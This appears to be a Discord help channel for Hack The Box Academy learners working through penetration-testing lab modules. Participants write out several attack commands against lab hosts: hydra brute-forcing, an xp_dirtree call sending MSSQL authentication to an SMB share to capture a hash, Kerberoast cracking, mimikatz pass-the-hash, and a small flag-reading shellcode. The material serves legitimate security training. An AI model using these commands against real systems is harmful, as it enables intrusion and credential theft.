#modules

1 messages · Page 247 of 1

fathom pendant
#

It can do both

fringe urchin
fathom pendant
#

It prefers kerberos creds since youre requesting domain info, however since you're providing a valid user and password, it works

ocean night
fringe urchin
ocean night
#

🙈

onyx halo
fringe urchin
worn matrix
fathom pendant
#

Domains are weird sometimes

onyx halo
fringe urchin
ocean night
#

Those WiFi devices that support monitor / inject etc are stupid cheap on eBay

fringe urchin
#

(For educational)

ocean night
#

Just gotta be sure to pick the right one

fringe urchin
#

Yea like 40€+

cloud urchin
#

yep, make sure to get one that supports NETLINK like the realtek ones

onyx halo
fringe urchin
#

I still have mine from a few years ago. Still works like a charm

ocean night
#

You can do it with a Pi IIRC

fathom pendant
#

What module/section?

ocean night
#

Did a demonstration years ago with one

onyx halo
#

final assessment for Kerberos attacks q 3

fringe urchin
ocean night
#

Yep, Pi Zero I think it was

#

Those tiny mofos

fringe urchin
onyx halo
#

however it works on the inside machine which chisel /server is running on

fathom pendant
#

Maybe only specify user then enter password?

onyx halo
#

like why would it be looking for kerberos ticket...

#

i tried it same thing

fathom pendant
#

Because that's part of a userspn

#

Most service accounts are assigned a ticket

onyx halo
#

user spn is: HTTP/inlanefreight.local:1433

fathom pendant
#

So they can do the thing

#

¯_(ツ)_/¯

#

Http sounds odd on port 1433

onyx halo
#

yea..

#

thats what it provides tho..

fathom pendant
#

and you can't do anything with that spn? ¯_(ツ)_/¯

cloud urchin
#

could probably use bloodhound to find the answer

fathom pendant
#

Your message is getting deleted because automod is thinking it's spam

onyx halo
#

yep

fathom pendant
#

Also formatting with ``` on the line before and after makes it look better

onyx halo
#

found the 'cause... i had KRB5CCNAME var setup and initialized to ./DC01$@INLANEFREIGHT.LOCAL_krbtgt@INLANEFREIGHT.LOCAL.ccache

#

in that particular terminal

fathom pendant
#

Ah

gray merlin
forest adder
#

hello, I'm on the privesc of nibbles, I run the sudo command and it asks for a password. The walkthrough says it should just go without it, but its not

fathom pendant
#

This is assuming 1: you unzipped the file and 2: added the relevant line to the end of the file

fathom pendant
#

Sudo perms require (at least afaik) the full path to the file

#

At least to abuse them

forest adder
#

that was it, needed the full path

#

thanks!

fathom pendant
#

Gl for next bits

fathom pendant
#

<@&861185840277487616>

urban sage
dim wolf
#

note: use slim ISO for blackarch.

supple gorge
#

that's how i fixed ir

fathom pendant
random bear
#

ty

#

btw, can i dm? @supple gorge i think i know u

supple gorge
random bear
#

after transferring cert.pfx to the downloads folder for this module, im running the .\rubeus.exe command in that same one, but its giving me network password is not correct. any idea why?

stable lava
#

hi

fathom pendant
#

Usually you can ping the dc

cloud urchin
#

what module

distant island
#

what is wrong with my command
wfuzz -z file,/Desktop/test.txt -z file,/Desktop/test.txt http://83.136.252.32:38065 -d "username=FUZZ&password=FUZ2Z"
module BROKEN AUTHENTICATION
Default Credentials

cloud urchin
#

for one you have two -z parameters

distant island
cloud urchin
#

I haven't done that module

stable lava
#

gm

fiery berry
distant island
quick juniper
#

hey guys so i recently tried to install tails os using a usb stick but whenever i load it and also boot mode is enabled so whenever i load it it leads me back to windows so can anyone suggest me how can i change

sacred gull
#

The support bubble wont pop up for me ( ive disabled adblock ) and whenever I load the page it says adblock is the reason

acoustic owl
acoustic owl
compact patrolBOT
sacred gull
#

okay thankyou!

quick juniper
#

i have chosen legacy first

fiery berry
acoustic owl
quick juniper
#

yes i checked and verfied it

acoustic owl
#

Maybe you'd better ask in the channel #homelab-sysadm because it has nothing to do with the Academy modules

quick juniper
#

ohk

#

but its showing no access so can you help

acoustic owl
quick juniper
#

thankyou

astral beacon
#

I'm fuzzing like an hour now but no progress

#

In the ffuf module assignment

cloud urchin
#

shouldn't take that long

astral beacon
#

I stuck at ||courses directory in both archive and faculty||

distant island
fathom pendant
distant island
fathom pendant
#

Well I'm just going off what you copy pasted right here

#

Is the port right?

distant island
fiery berry
fathom pendant
#

Unless you have a Desktop file in your filesystem root

#

Idk if it would let you do ~/Desktop/test.txt

distant island
#

thhanks mates ❤️

astral beacon
#

Ok so I'm out of idea

fathom pendant
#

Module name?

astral beacon
#

Attack web application with ffuf module

distant island
astral beacon
#

Stuck at the third exercise

#

Here it need you to find a page that ||said 'You don't have access!'||

distant island
#

which one ?

astral beacon
#

Skill assignment

fathom pendant
#

Are you setting your filter to match content or whatever? So that it matches the text?

#

-m is for matching

#

-f is for filtering out

astral beacon
#

I only filter the matching word rn

fathom pendant
#

Again, make sure you use the right thing with ffuf

#

-f[n] filters out, meaning you don't see what you put
-m[n] matches what you filter for

astral beacon
#

Yes,Ik

fathom pendant
#

¯_(ツ)_/¯

astral beacon
#

I filter them out because it will show every single one

#

Plus it length doesn't the same

fathom pendant
#

If you're too restrictive then you might miss it

astral beacon
#

ffuf doesn't had match content,does it?

fathom pendant
#

Also I think no access is like a 401 code if that helps any

fathom pendant
#

Do ffuf --help to see all options

#

For every -f option there's a -m

astral beacon
#

I mean it content

fathom pendant
#

I mean there's match lines and match words mode

astral beacon
fathom pendant
#

403 is the forbidden code, yes

astral beacon
#

Maybe

#

It about my dns

fathom pendant
#

¯_(ツ)_/¯

astral beacon
#

I only use header to get to the site

#

LMAO

#

I waiting so long

fathom pendant
#

Lmao made some adjustments eh?

astral beacon
#

No

#

I just happened to found

fathom pendant
#

Ah

astral beacon
#

During conversation

fathom pendant
#

Lol

#

Patience is king

astral beacon
#

Patient is virtue

#

Sadly virtue is not patient

cedar void
#

For the second question on the 1st Brute login assessment, when I run the hydra command , I am not sure why its saying the rockyou.txt is not found when its clearly there in the directory.

"Once you access the login page, you are tasked to brute force your way into this page as well. What is the flag hidden inside"

https://academy.hackthebox.com/module/57/section/515
||hydra -l user -P /opt/useful/SecLists/Passwords/Leaked-Databases/rockyou.txt -f 94.237.57.59 -s 36768 http-post-form "/login.php:username=^USER^&password=^PASS^:F=<form name='log-in'"||

fathom pendant
#

Try with the /usr/share/ one

compact jacinth
#

Could anyone help me out? How can I search for L____r in poweshell without the errors? When I only do strings I don’t get errors

vague sage
#

Connect to the target host and search for a domain user with the given name of Robert. What is this users Surname?

i tried
Get-ADUser -Identity Robert

and it says Robert is wrong or something

#

cant think of anything else im not gonna lie

#

wait

fathom pendant
#

Because I believe identity searches samaccount name

#

Not the given name

vague sage
#

i got it

fathom pendant
#

Nice

vague sage
cedar void
# fathom pendant Try with the /usr/share/ one

I tried that but what was also the issue was that I wasn't using the sudo command . For whatever reason , the rockyou.txt that was in the leaked database directory required a sudo command because I needed to use the sudo command in order to open the file.

fathom pendant
#

¯_(ツ)_/¯

twin nacelle
cedar void
autumn pilot
#

not more than 5 minutes

cedar void
autumn pilot
#

nope

cedar void
#

Why do you think mine could be running slow?

autumn pilot
#

If you are using rockyou.txt you would have to change your approach

#

did you checked the hint

cedar void
# autumn pilot did you checked the hint

||"You may reuse the username you found earlier. Make sure you got the correct fail string and parameters."

Yes. I already went to the view source code page of that login.php form, looked at the '<form-name=' section and made the corrections for my hydra command.
||

autumn pilot
#

generate a wordlist based on the requirements presented from the previous assessment

#

use the name that was found earlier

cedar void
autumn pilot
#

oh, for the first one think of something that lazy administrators do

cedar void
# autumn pilot oh, for the first one think of something that lazy administrators do

I corrected the php command , ran it and it currently is still running. Should I create a wordlist rather than use existing wordlists?

|| sudo hydra -l user -P /opt/useful/SecLists/Passwords/Leaked-Databases/rockyou.txt -f 83.136.255.150 -s 32876 http-post-form "/admin_login.php:username=^USER^&password=^PASS^:F=<form name='log-in'" -t 4
||

wooden coyote
#

anyone else seeing huge latency spikes and packet drops us-east-1?

#
rtt min/avg/max/mdev = 19.223/209.673/1927.075/488.385 ms, pipe 2
summer lava
#

Hey Guys - Can i please have some asisstance on this - INTRO TO ASSEMBLY LANGUAGE

inland shoal
#
During our examination of the USN Journal within Timeline Explorer, we observed "uninstall.exe". The attacker subsequently renamed this file. Use Zone.Identifier information to determine its new name and enter it as your answer.
``` Need help on this Digital fornesics module
#

I found the zone idenfifier with the IP + file name but the filename is still uninstall.exe 🤔

dim wolf
#

no

#

it doesn't matter how many excuses you give, nobody is giving you the flag

#

if you're having issues with connectivity and it's not on your end, reach out to support

#

if the module didn't give you these creds, delete this message

dim wolf
#

i'm not looking at DMs.

#

please ask next time before DMing

inland shoal
#

the zoneinfo in MFT just shows uninstall.exe though:/ I filtered every zoneinfo in the MFT and only found other unrelated exes

dim wolf
#

you have the Zone.Identifier info, and you know the attacker renamed the file. how can you determine file rename events?

#

once you figure that out, correlate what you find with the Zone.Identifier information, and you will know which file was renamed

#

just look for file rename events

inland shoal
#

ahhh alright thanks alot!

outer grotto
#

Hello, I need help to solve an easy problem of hackthebox, it is a challenge, this does not require any knowledge in vhdl but rather it is about the logic of it to be able to decipher the flag, VHDLOCK to be more exact, any help write to me in DM thanks

acoustic owl
crystal heath
#

I am still stuck on - "Intrusion Detection With Splunk (Real-world Scenario)" Q3 find through an SPL search against all data any suspicious loads of clr.dll that could indicate a C# injection/execute-assembly attack. Then, again through SPL searches, find if any of the suspicious processes that were returned in the first place were used to temporarily execute code. Enter its name as your answer. Answer format: _.exe
Ive tried - 'clr.dll | stats count by Image'
Get around 26 results, but none of these were the answer.
clr.dll | stats count by ProcessName ParentProcessName
Similair processes found in .exe but none of these were correct either. Any hints or DM assistance appreciated.

warped widget
#

Hi! Im stuck on an easy section on the "LINUX PRIVILEGE ESCALATION" module, "Sudo Rights Abuse".

"What command can the htb-student user run as root?"

In my world i was sure that i just had to check "sudo -l". But apperently im missing something right? openssl gets marked as incorrect

warped widget
#

for openssl?

limber river
#

maybe

warped widget
#

i could check, but i thought the question was which command i could run as root, whetever it was exploitable or not?

limber river
#

aaah maybe check with the absolute path

warped widget
#

wow that did it haha. Thanks

winged egret
#

hello guys a quick quest regarding AD : In a DC does the builtin\Administrators have higher privileges than Domain Admins on that DC particularly ?

languid galleon
winged egret
#

yea i think bultin\administrators have higher privs on the DC itself than the Domain Admins

haughty tree
#

sadglas It's been like this for a while

warped widget
#

Sorry for a general question, but are there any way to debug why the ssh connection is super laggy? Switched vpn, didnt work. Trying to figure it if its the box or something i can do on my machine

inland shoal
haughty tree
#

Can anybody help me understand the highlighted line? does that mean that the IP address of the Decoy must be a real one that is running?

halcyon dock
#

Why I can't Post images

cloud urchin
#

because you didn't follow the rules

halcyon dock
#

What rules

#

You mean roles

cloud urchin
astral gazelle
#

Hy

rustic sage
#

Good afternoon all. I have a question. I am working on the "Using Web Proxies" module and I am stuck on the section on "ZAP Fuzzing". I had no issue with the content, and was able to half way through the question at the end, but I am stuck. I fuzzed the cookie using the wordlist as instructed, but I am not seeing a flag returned, or any clue on how to proceed. I am just looking for a little guidance, not the full answer. SOLVED

compact jacinth
#

Hi im doing the YARA and Sigma module and have been stuck on one question for days and I cant solve it at all. Help
The "C:\Rules\yara\seatbelt.yar" YARA rule aims to detect instances of the "Seatbelt.exe" .NET assembly on disk. Analyze both "C:\Rules\yara\seatbelt.yar" and "C:\Samples\YARASigma\Seatbelt.exe" and specify the appropriate string inside the "$class2" variable so that the rule successfully identifies "C:\Samples\YARASigma\Seatbelt.exe". Answer format: L________r
I understand that you need to do strings or look in HxD and i have done that and been scrolling for hours. Someone tell me how you guys got it without wasting so much time

sturdy pelican
#

hi, i cannot log into my account anymore where can i contact support for academy?

compact patrolBOT
halcyon dock
#

Hi, Is there problems if I used Nmap on a random website?

dim wolf
compact jacinth
#

Can I use xrdpfree to download the damn Seatbelt.exe and just run grep on it?

dim wolf
compact jacinth
dim wolf
#

read carefully. it is a .NET assembly that you are analyzing. look at the section again

#

there's a program that you can use that will help immensely

compact jacinth
dim wolf
#

did you try anything else

compact jacinth
dim wolf
#

try another program

halcyon dock
compact jacinth
dim wolf
halcyon dock
#

Don't worry this is not real scan lollll

#

This is generated by chat gpt

compact jacinth
gray chasm
#

Someone sees the bug here in the hash format of a kerberoasting attack, I dumpee it with rubeus.

analog dock
#

And have you tried with hashcat?

gray chasm
rustic harness
analog dock
#

And try with hashcat

#

Instead of John

gray chasm
#

This mode, I think it was 18200.

wanton idol
#

hello im doing Attacking Common Applications - Skills Assessment II and on the question What is the name of the public GitLab project? i have found the public gitlab project but its not taking the name as the correct answer so im not sure if its in a different format or theres a different name somewhere inside of the project bc ik its that one since i used that project to complete the rest of the other questions

fathom pendant
gray chasm
fathom pendant
#

18100 is for asrep

analog dock
gray chasm
#

But with john it should also work, right? It should detect the hash

analog dock
#

It should auto detect

fathom pendant
#

If you're unsure always check the signature with the hashcat wiki

analog dock
#

If it doesn’t you can just check example hashes

fathom pendant
#

John can be a bit dumb at times

gray chasm
#

Jajajaja

fathom pendant
#

Try specifying --format=krb5tgs

analog dock
#

And I believe it should be -w= instead of -w:

fathom pendant
#

Also I don't recall the format being -w:

analog dock
#

I use —wordlist=

fathom pendant
#

That could also be a contributing factor

gray chasm
#

Nothing works either

#

There must be something that john doesn't like.

fathom pendant
gray chasm
#

If it's the way I've always done it

analog dock
#

john —wordlist=/usr/share/wordlists/rockyou.txt —format=krb5tgs hash

#

Try that

fathom pendant
#

Weird.

gray chasm
#

He doesn't get it anyway, there must be something xd

#

Pull hashcat and you're done

analog dock
#

You’re using the same hash?

gray chasm
#

yes

analog dock
#

As in one screenshot you use hash, and the other hashes.kerberoast

gray chasm
analog dock
#

🤷🏼‍♂️

gray chasm
glacial bay
#

Heh question, I'm on Footprinting > SMB , final question
What is the full system path of that specific share? (format: "/directory/names")

but when I put in /home/sambauser or /home/sambauser/contents It says neither of those are correct

analog dock
glacial bay
#

because it asks for full path

analog dock
#

Path looks like /home/sambauser/sambashare in that case

glacial bay
#

nope

analog dock
#

Try it like it’s shown on the rpc path

#

C:\home\sambauser\

glacial bay
#

Hint says otherwise
Remember that Linux-based operating systems do not have a "C:" drive.

analog dock
#

This is last question of footprinting smb?

glacial bay
#

yes

analog dock
#

/home/sambauser

glacial bay
#

wtf

#

i did that

analog dock
#

That should work

glacial bay
#

it did, but i had already done that, lol

analog dock
#

Perhaps a typo

glacial bay
#

i'll assume that, call me crazy

analog dock
#

You’re crazy

glacial bay
#

thanks, so i had the right idea but must have been a typo or something

And thanks, I am crazy

analog dock
fathom pendant
dim wolf
#

you're blue now?

#

congrats on being blue

fathom pendant
#

A darker blue. Like more of a teal

fringe urchin
#

ew congratz for the role marcieduckthumbsup deserved

acoustic owl
dim wolf
#

😦

acoustic owl
viscid horizon
#

Hello everyone

#

My question if i want to know traffic analyzier its important for networking

fathom pendant
#

Analyzing network traffic is important for SOC roles

viscid horizon
#

I read it in pentster

fathom pendant
#

Eh there's tools used that sniff specific things on the network

#

But you're not needing to manually sift through anything

viscid horizon
#

Its for tcp udp right

lyric trench
#

what's up y'all, I'm just trying out academy and starting out in the AD enum & attacks module to get a feel for how this all works. Going through the "Initial enumeration of the domain" portion and running wireshark in the rdp session currently. I'm not getting any MDNS packets as the material specifies how we can identify the "ACADEMY-EA-WEB01" host. I'm only getting NBNS packets showing ACADEMY-EA-WEB0. Just wondering if I'm doing something wrong or that this is expected

lyric trench
#

ahhh gotcha. Just wanted to make sure, I was racking my head like what could be different with what I'm doing lol

fathom pendant
#

Also ad enum and attacks is a midpoint module for the pentester path

#

And assumes knowledge of concepts that may have been presented previously

lyric trench
#

Right, I'm coming over from finishing the TCM Sec PEH course

fathom pendant
#

Every module has a "pre-requisite" module so to speak

#

It's also recommended to do the CPTS path in order

lyric trench
#

Just trying to find material related to what I went over in that course and find other ways to go about using the same tools or find new tools that weren't used in that course

fathom pendant
#

just a recommendation as CPTS is more challenging and thorough than other intro pentest exams ¯_(ツ)_/¯

lyric trench
#

Completely understand! Thanks for the info

fathom pendant
#

And if anything, if you already know the tools and techniques, you can breeze through the early bits

lyric trench
#

Yeah I hear that, they didn't go through packet sniffing for enumeration on an internal network in the PEH so that caught my attention right at the beginning hahaha

fathom pendant
viscid horizon
#

U mean cpts giving more pentesting information

#

@fathom pendant

fathom pendant
#

Yes

viscid horizon
#

I will start after
The pentesting

#

Cpts

#

After the info security

#

Going to pentesting after that I will took cpts in hack the box

#

And taking bug bounty

#

@fathom pendant

analog dock
#

Is that a question?

fathom pendant
viscid horizon
fathom pendant
#

As in whatever path forward works to get you to your goal

analog dock
#

What do you mean with path forward

#

@fathom pendant

fathom pendant
analog dock
worn matrix
#

does anyone has any idea,about this error ? sudo apt install crackmapexec
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
Some packages could not be installed. This may mean that you have
requested an impossible situation or if you are using the unstable
distribution that some required packages have not yet been created
or been moved out of Incoming.
The following information may help to resolve the situation:

The following packages have unmet dependencies:
crackmapexec : Depends: python3-neo4j but it is not installable
E: Unable to correct problems, you have held broken packages .i try to install ypthon3-neo4j i get error,i cant fix broken packages or something,there is none

cloud urchin
#

what OS are you using?

worn matrix
#

Parrot

cloud urchin
#

ah yeah no idea what that comes with. sounds like you need to install python3-neo4j first. you could also just try installing netexec instead, as it's the successor to cme.

worn matrix
cloud urchin
#

probably have to read the error messages

analog dock
#

Check their site to see how to do it

cloud urchin
worn matrix
#

thanks for the help

wide river
#

when will this happen

fathom pendant
#

Also install netexec instead

fathom pendant
#

It's in settings

dark vector
#

I need help

wide river
fringe urchin
#

module:Password attacks
Section:pass the hash
Got david flag quite easy but still a question on my mind since AD is probably the least ive work with in the past:
|| so once you pass the david hash you get a shell as NT authority. Is there a reason you cant access DC01 david with impacket-smbexec? after i failed with it, i tried with with mim and it worked. ||

inner geyser
#

Feeling like i'm missing something obvious in 'Attacking Common Services : Attacking SQL Databases" on the first question...which is just "What is the password for the 'mssqlsvc' user?" lol....We are given creds to login, which I use to show me the tables (master, msdb, tempdb, hmaildb, flagdb)....don't have permissions to the last two. I've seen other hints to use Responder and capture the MSSQL hash...but that's not doing anything for me as xp_dirtree shows nothing and no permissions for xp_subdirs. Also can't enable xp_cmdshell due to privileges. I've tried a one-liner for impersonation to mimic the command in the module (see below) but that also returns blanks:

1> SELECT distinct b.name
2> FROM sys.server_permissions a
3> INNER JOIN sys.server_principals b
4> ON a.grantor_principal_id = b.principal_id
5> WHERE a.permission_name = 'IMPERSONATE'
6> GO

Used impacket-mssqlclient.py to access SQL. Any hints that extend beyond 'check responder section' or "USE <DB name> to use a DB, SELECT * FROM <DB Name>.INFORMATION_SCHEMA.TABLES to get tables in a DB, SELECT * from <table name> to get table contents"....would be amazing as I don't see any tables in any of those DBs listed above that are going to give me the info I"m looking for...password, hash, or otherwise.

fathom pendant
fringe urchin
fathom pendant
#

I don't recall elevating anything ¯_(ツ)_/¯

#

I just connected via smbclient and read the thing

#

It's been a minute though

#

I might be thinking of PTT

fringe urchin
#

sht ill delete the second ss since it contains hash

cloud urchin
#

that one is showing a flag

fringe urchin
#

well yea but why does the first one have access to it?

#

while the second not?

cloud urchin
#

i'm going to guess because david has access to that and the system account doesn't

fathom pendant
#

^

#

Because DC01 is a separate machine it doesn't have the same permissions

#

ACLs go brrr

fringe urchin
#

so just because i added /domain:xxx.htb it worked on mimikatz?

inner geyser
cloud urchin
#

no. we have no idea the steps you took up to this point, but that file can only be accessed by the account 'david', and on the screen where you don't have access you're not logged in as david so you don't have permissions to view it

fringe urchin
#

i can dm you the steps but for me both look like they are nt authority?

#

maybe im just plain stupid here and missing the point

cloud urchin
#

does your mimikatz syntax include /user:david and /run:cmd.exe?

cloud urchin
#

that's why

#

when you do that, it opens a cmd.exe window under the user context of david

#

with his permissions

fringe urchin
#

oooh so im actually in davids permission with that

cloud urchin
#

yes

fringe urchin
#

that makes sense

#

ok ty added to my notes duckheart

cloud urchin
#

nt authority/system is the local system account for the computer, david's account is an active directory account. the local system doesn't have privileges to access david's files

fringe urchin
#

yea i guessed that but was consfused why one has priv while other doesnt if they are both same user, but yea seems like with mimi we got davids perms while still under nt auth

#

makes sense, tyvm

rustic sage
#

That "Using Web Proxies" module just about cooked my brain, but I managed to finish the skills assessment!

inner geyser
#

Is there some tech support I can contact regarding this attacking common services/attacking SQL Databases module? I've done the 'Show Solution' option and on both(separately) my box and the PWNBOX to steal the MSSQL service account hash..following step-by-step and the hash does not show up via the documented impacket-smbserver or when I tried responder instead. Also tried terminating and starting up a fresh version of the target server

#

looked on the site but didn't see anything

fathom pendant
#

xp..dirtree //your_ip/share

cloud urchin
#

Try using the command exactly as shown in the module

fathom pendant
#

Responder also needs to be specified to your tun0 interface

inner geyser
#

like responder -I tun0?

#

i've done the commands exactly as shown...the one command that I'm wondering about is sudo impacket-smbserver share ./ -smb2support, but i'm assuming the ./ is the share for the 'current working directory' on your box

cloud urchin
#

well, you say you've done the commands exactly as shown, but what you showed us here is not the same as what's in the module. so which is it?

fathom pendant
fathom pendant
#

Smb requires the sharename to connect

#

The sharename is "share"

#

smbserver <sharename> <path> [options]

inner geyser
#

sqlcmd -S 10.129.251.65 -U htbdbuser
sudo impacket-smbserver share ./ -smb2support

(inside sql):
EXEC master..xp_dirtree '\10.129.251.65\share'
go

fathom pendant
inner geyser
#

yeah lol

#

that should be the listening IP i now assume

cloud urchin
#

yeah i don't think 10.129.251.65 is "your_ip"

fathom pendant
#

How do you steal the hash if you don't have it connect to you

inner geyser
#

sorry all lol

#

about as dumb as it gets

#

thanks

tacit bolt
#

Is it normal when using pwnbox that every 3-5 minutes your ssh session to the target you connect to is no longer responsive and then you have to kill the target and respawn it?

cloud urchin
#

no, only really see that if people are brute forcing incorrectly or something

tacit bolt
#

I am doing linux fundamentals in academy and just running ls commands and the target stops responding, as well as to pings. Respawning a new target fixes it for about another 3-5 min

cloud urchin
#

no one here can really help with that, you'll have better luck reaching out to support on the site

fathom pendant
#

Try changing vpn regions (vpn is different from Pwnbox)

#

And yes, it will affect even though your using pwnbox

#

Pwnbox region = attack box
Vpn region = target box

tacit bolt
#

Does chaning the VPN Servers region work even if I dont download the VPN connection file? Is it associated with my account. So when I spawn a target it uses the VPN Servers dropdown I had selected?

sleek moss
#

AD Enumeration & Attacks - Skills Assessment Part I
I try to upload chisel thru the webshell but it just gives me erorr and wont upload chisel

cloud urchin
#

try reading the error

fathom pendant
#

Vpn region dictates spawn region for the targets

tacit bolt
#

Okay thank you. I am testing that

minor kindle
#

Use the IP adress that you spawned with the port number.

fathom pendant
#

You might need to restart the pwnbox for it to work right

cloud urchin
sleek moss
#

Server Error in '/' Application.
Runtime Error
Description: An application error occurred on the server. The current custom error settings for this application prevent the details of the application error from being viewed remotely (for security reasons). It could, however, be viewed by browsers running on the local server machine.

Details: To enable the details of this specific error message to be viewable on remote machines, please create a <customErrors> tag within a "web.config" configuration file located in the root directory of the current web application. This <customErrors> tag should then have its "mode" attribute set to "Off".

<!-- Web.Config Configuration File -->

<configuration>
<system.web>
<customErrors mode="Off"/>
</system.web>
</configuration>

Notes: The current error page you are seeing can be replaced by a custom error page by modifying the "defaultRedirect" attribute of the application's <customErrors> configuration tag to point to a custom error page URL.

<!-- Web.Config Configuration File -->

<configuration>
<system.web>
<customErrors mode="RemoteOnly" defaultRedirect="mycustompage.htm"/>
</system.web>
</configuration>

cloud urchin
#

looks like the first two paragraphs explain how to view the error. how did you start this web server?

sleek moss
#

lab

#

no i mean it has upload button

cloud urchin
#

are you able to execute code? even if you're able to upload chisel, without code execution it isn't going to do much. maybe focus on getting a shell first.

random bear
fathom pendant
#

Sad :( I was gonna repost it so it embeds

onyx halo
#

finished the Kerberos attacks..

#

whoever has q's, shoot me dm

gray merlin
onyx halo
#

tbh don't know, probably will finish something on the close subj, like DACL attacks

#

ad/windows

cloud urchin
#

DACL attack was really fun

onyx halo
#

ye?

cloud urchin
#

so was ADCS if you haven't done that

onyx halo
#

nope haven't

#

thanks, i'll think about it

gray merlin
onyx halo
#

👍

#

I have read somewhere that CPTS is closest to what presented on OSCP, is that true guys?

gray merlin
#

I haven't taken the CPTS, I do have the OSCP. OSCP seems a bit more script kiddie type of test. Find application name/version, search for exploit to get foothold.

#

CPTS does not seem to include known vulns with existing POCs for footholds. At least that is the feeling I get.

onyx halo
#

Got it, thank you

sleek moss
#
  • 1 Submit the contents of the C:\flag.txt file on MS01. any advice on how to access ms01? AD Enumeration & Attacks - Skills Assessment Part II
    i tried xfreerdp ssh power etc
fathom pendant
sacred gull
sleek moss
#

why not tho

#

if i do full cpts path can i just do oscp

fathom pendant
sleek moss
#

ik i got it

fathom pendant
#

Remember the entirety of the domain is on an internal network

#

So you either have to A use the provided linux host to jump from or B use a pivot

sleek moss
#

┌─[✗]─[htb-student@skills-par01]─[~]

[20:36:53:930] [1517:1517] [ERROR][com.freerdp.client.x11] - failed to open display:
[20:36:53:930] [1517:1517] [ERROR][com.freerdp.client.x11] - Please check that the $DISPLAY environment variable is properly set.

#

and ok danke does this mean i connected to it too early?

fathom pendant
sleek moss
#

soz

fathom pendant
#

If you're ssh into the linux box, that's why

#

Ssh doesn't carry a display variable

sleek moss
#

oh ic

#

but i can only xfreerdp into Ms01 right

fathom pendant
#

¯_(ツ)_/¯

#

figure it out; it's a skill exam

#

always be enumerating for new users

fathom pendant
#

or use pivoting techniques to allow you to connect directly to the MS01 host

gray merlin
cloud urchin
#

without doing either it seems to me like oscp is a beginner pentest cert while cpts is more intermediate

gray merlin
#

There is something to a test that says use any tool you want, and it is still tough, versus a test that restricts tools for fear it will be too easy.

sleek moss
#
  • 1 Use a common method to obtain weak credentials for another user. Submit the username for the user whose credentials you obtain. any tips for this? i tried requesting all spns but none i found all computers, dc and mssql host etc
random bear
#

For enabling Live Rule Reloading Feature through suricata rulesets, when I edit the suricata.yaml file, there is no detect-engine in that file... just curious if im missing something

fathom pendant
#

Slowly go through the techniques outlined in the module

#

They will each be useful parts of enumerating the answer

sleek moss
#

Get-DomainObjectACL -Identity * | ? {$_.SecurityIdentifier -eq $sid}

why dont this work

fathom pendant
#

do you have an $sid variable set?

finite shuttle
#

Is this the right place to ask a question? I've reached the end to the Intro to Assembly Language I'm trying to figure out how to optimize my assembly code for shellcoding to be less than 50 bytes?

global _start
section .text
_start:
    ; push './flg.txt\x00'
    xor rdi, rdi
    push rdi            ; push NULL string terminator
    mov rdi, '/flg.txt' ; rest of file name
    push rdi            ; push to stack 
    ; open('rsp', 'O_RDONLY')
    mov rax, 2           ; open syscall number
    mov rdi, rsp        ; move pointer to filename
    xor rsi, rsi          ; set O_RDONLY flag
    syscall
    ; read file
    lea rsi, [rdi]      ; pointer to opened file
    mov rdi, rax        ; set fd to rax from open syscall
    xor rax, rax          ; read syscall number
    mov dl, 24         ; size to read
    syscall
    ; write output
    mov rax, 1       ; write syscall
    mov rdi, 1        ; set fd to stdout
    mov dl, 24         ; size to read
    syscall
    ; exit
    mov rax, 60
    ;mov dil, 0
    syscall
sleek moss
#

ya

fathom pendant
#
global _start
section .text
_start:
    ; push './flg.txt\x00'
    xor rdi, rdi
    push rdi            ; push NULL string terminator
    mov rdi, '/flg.txt' ; rest of file name
    push rdi            ; push to stack 
    ; open('rsp', 'O_RDONLY')
    mov rax, 2           ; open syscall number
    mov rdi, rsp        ; move pointer to filename
    xor rsi, rsi          ; set O_RDONLY flag
    syscall
    ; read file
    lea rsi, [rdi]      ; pointer to opened file
    mov rdi, rax        ; set fd to rax from open syscall
    xor rax, rax          ; read syscall number
    mov dl, 24         ; size to read
    syscall
    ; write output
    mov rax, 1       ; write syscall
    mov rdi, 1        ; set fd to stdout
    mov dl, 24         ; size to read
    syscall
    ; exit
    mov rax, 60
    ;mov dil, 0
    syscall
sleek moss
#

im ngl i tried so hard

#

cant find nuffin....

fathom pendant
#

including ones that would get you domain usernames as a list to pull from

sleek moss
#

i cok danke

fathom pendant
#

again

#

as stated; everything you need to complete this (for the most part) is in the module

#

another revolves around uploading a shell

sleek moss
#

i co k danke u got any recomenation for password list? im using top 200 there bout 50 accs so... this shid ognna take a lng time...

fathom pendant
#

if you're using a password list it's no longer spraying

#

it's bruteforcing

#

use a simple easily guessable password

#

maybe what might be used as an onboarding password

sleek moss
#

ohh i c anke

fathom pendant
#

I really heavily suggest re-reading and revising your notes on this module

#

you're overlooking some fairly simple things; tip: when stuck in a module skill assessment -- go through the other module sections, in order, and see what sticks for your scenario

#

based

elder sapphire
#

I am trying to do windows file transfer module. I have to transfer/upload the file to windows without RDPing. There is an ftp server running. I cant use ftp IP then user htb-student and HTB_@cademy_stdnt! perhaps the problem is the with the special characters in the password. I also have tried to use ftp htb-student:HTB_@cademy_stdnt\!@IP and ftp "htb-student:HTB_@cademy_stdnt\!"@IP but none worked.
Any suggestion?

west canopy
fathom pendant
elder sapphire
# west canopy which section is this? IIRC for any section with a windows target, they provide ...

Thanks for responding. I am NOT having problem with RDPing!
As per the question: Upload the attached file named upload_win.zip to the target using the method of your choice. Once uploaded, RDP to the box, unzip the archive, and run "hasher upload_win.txt" from the command line. Submit the generated hash as your answer.
As per my understanding, we first have to upload the file to the windows and then RDP into it to unzip and run hashing upload_win.txt . I don't know how to upload it without using rdping first.

fathom pendant
#

xfreerdp has /drive:, you can start an smbserver, you can host an http server

west canopy
fathom pendant
#

yeah the word order is off

west canopy
#

unless it has something like webDAV running I'm not sure there's any other way to do it. Maybe smbclient?

fathom pendant
#

or even omitting the "RDP to the box" portion

#

Once uploaded unzip the archive, and run "hasher upload_win.txt"

elder sapphire
#

Ok. Rewording make sense.. else I was beating myself for bing too noob to not come up with something.

fathom pendant
elder sapphire
#

I did

fathom pendant
#

nmap $IP

elder sapphire
#

ftp, smb

fathom pendant
#

is ftp running?

elder sapphire
#

yes

fathom pendant
#

hmm

west canopy
fathom pendant
#

could just be a weird thing with your connection not wanting to fully connect to ftp

#

sometimes it can take a minute after you connect to ftp for it to prompt for username and password

distant island
#

Broken Authentication - Weak Bruteforce Protections in this module how can i do it with burp cause i feel like the script provided is not working

#

nevermind i did it with burp ❤️

#

now why the script didnt work ? xd

west canopy
# fathom pendant or even omitting the "RDP to the box" portion

